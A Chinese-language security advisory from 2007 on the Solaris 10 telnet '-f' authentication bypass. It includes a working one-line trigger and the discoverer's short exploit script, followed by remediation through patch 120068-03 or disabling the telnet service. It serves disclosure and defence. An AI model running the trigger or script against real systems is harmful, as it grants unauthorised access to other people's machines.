|
Solaris 10 telnet漏洞及解决
|
|
来源:www.vfocus.net 作者:vfocus 发布时间:2007-04-19
|
|
漏洞最早发现者 Kingcope
http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf
(另: 上次 SunOS login TTYPROMPT环境变量绕过验证漏洞发生在 2002年10月
http://marc.theaimsgroup.com/?l=bugtraq&m=103357889303304&w=2
http://marc.info/?l=bugtraq&m=103357889303304&w=2
)
受影响的版本:
Solaris 10及以后版本
触发方法:
-l 后面跟 -fusername
telnet -l"-fbin" 192.168.1.1
发现者提供的脚本如下:
#!/bin/sh
# CLASSIFIED CONFIDENTIAL SOURCE MATERIAL
#
# *********************ATTENTION********************************
# THIS CODE _MUST NOT_ BE DISCLOSED TO ANY THIRD PARTIES
# (C) COPYRIGHT Kingcope, 2007
#
################################################################
echo ""
echo "SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope kingcope@gmx.net"
if [ $# -ne 2 ]; then
echo "./sunos <host> <account>"
echo "./sunos localhost bin"
exit
fi
echo ""
echo "ALEX ALEX"
echo ""
telnet -l"-f$2" $1
解决:
1. 打补丁
说明:Solaris 10的补丁,除了Security和hardware相关补丁可以免费下载,其它都是要服务支持的,
就是Sun Service Plan。但是对于知道Patch号的,可以从http://sunsolve.sun.com中单个下载。
这里可以在sunsolve上用PatchFinder查找120068-03补丁并下载,安装到系统中。
# showrev -p | grep 120068
Patch: 120068-01 Obsoletes: Requires: Incompatibles: Packages: SUNWtnetd
Patch: 120068-03 Obsoletes: Requires: Incompatibles: Packages: SUNWtnetd
2. 可以禁止telnet方式登录
# svccfg list | grep telnet
network/telnet
# svcs -l network/telnet
fmri svc:/network/telnet:default
name Telnet server
enabled true
state online
next_state none
state_time Mon Feb 26 03:50:13 2007
restarter svc:/network/inetd:default
禁止telnet服务
# svcadm disable svc:/network/telnet:default
SUN技术支持工程师Alan Hargreaves的相关blog:
http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit
|
| |
|
[ 推荐]
[ 评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
| |
|
|
 |
|
推荐广告 |
|
|
|
|
|
